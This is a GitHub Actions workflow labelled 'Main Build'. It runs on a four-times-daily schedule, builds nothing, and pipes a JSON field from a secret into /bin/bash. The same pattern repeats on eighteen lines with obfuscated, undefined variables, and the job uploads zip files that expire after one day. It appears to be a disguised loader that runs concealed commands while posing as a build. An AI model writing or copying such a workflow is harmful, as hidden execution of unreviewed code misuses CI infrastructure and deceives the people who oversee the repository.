name: Main Build
on:
  workflow_dispatch:

  schedule:
    - cron: '56 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          n3: ${{ secrets.n3 }}
        run: |
          printf '%s' "$n3" | jq -r .hxq7 | /bin/bash
          printf '%s' "$iqfb092" | jq -r .r878 | /bin/bash
          echo $xg0564 | jq -r .takc6358 | /bin/bash
          echo $uj48 | jq -r .rooe0446 | /bin/bash
          printf '%s' "$b934" | jq -r .jsn155 | /bin/bash
          echo $dazs03480 | jq -r .iymey22 | /bin/bash
          echo $pqyhc1 | jq -r .nv5720 | /bin/bash
          printf '%s' "$utlmz879" | jq -r .nxz69187 | /bin/bash
          echo $hx32211 | jq -r .jzh56666 | /bin/bash
          echo $b22669 | jq -r .qux2 | /bin/bash
          echo $p3 | jq -r .t0149 | /bin/bash
          printf '%s' "$d428" | jq -r .msynk3 | /bin/bash
          printf '%s' "$ni52222" | jq -r .u07 | /bin/bash
          echo $tv77 | jq -r .ls1344 | /bin/bash
          echo $fj9700 | jq -r .xxch9008 | /bin/bash
          printf '%s' "$swl855" | jq -r .n63516 | /bin/bash
          printf '%s' "$cbqg48769" | jq -r .mw121 | /bin/bash
          echo $gw7085 | jq -r .firdl9 | /bin/bash
          echo $xqwiq1 | jq -r .aeou2300 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: e5Jzud30
          path: "*.zip"
          retention-days: 1
